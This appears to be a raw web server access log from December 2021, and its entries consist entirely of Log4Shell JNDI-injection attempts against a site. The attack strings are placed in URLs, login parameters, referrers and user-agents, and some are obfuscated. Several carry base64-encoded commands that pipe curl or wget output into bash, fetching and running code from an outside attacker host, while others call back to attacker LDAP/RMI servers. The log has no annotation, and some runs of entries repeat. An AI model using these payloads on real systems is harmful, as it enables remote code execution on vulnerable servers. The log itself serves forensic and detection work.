178.176.203.190 - - [19/Dec/2021:07:46:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
107.189.29.181 - - [19/Dec/2021:14:10:44 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}"
195.54.160.149 - - [19/Dec/2021:14:55:50 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [19/Dec/2021:23:47:39 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [19/Dec/2021:23:47:40 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
95.214.235.219 - - [20/Dec/2021:09:33:08 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&f=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 464 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:09 +0000] "GET /?x=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&f=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 200 5382 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:09 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&f=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 464 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:10 +0000] "GET /?x=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&f=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 200 5382 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:10 +0000] "GET /admin/ HTTP/1.1" 302 211 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:11 +0000] "GET /admin/ HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:11 +0000] "POST /admin/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 730 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:12 +0000] "GET /admin/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:12 +0000] "GET /v1/ HTTP/1.1" 302 208 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "GET /v1/ HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "POST /v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 727 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "GET /v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "GET /v2/ HTTP/1.1" 302 208 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "GET /v2/ HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "POST /v2/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 727 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:15 +0000] "GET /v2/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:15 +0000] "GET /login/ HTTP/1.1" 302 211 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:16 +0000] "GET /login/ HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:16 +0000] "POST /login/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 730 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:17 +0000] "GET /login/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:17 +0000] "GET /api/ HTTP/1.1" 302 209 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:18 +0000] "GET /api/ HTTP/1.1" 404 202 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:18 +0000] "POST /api/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 728 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /api/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 202 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 302 213 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "POST /console/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 732 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "GET /console/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "POST /api/v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 302 213 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "POST /console/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 732 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "GET /console/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "POST /api/v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v2/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:23 +0000] "GET /api/v2/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:23 +0000] "POST /api/v2/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
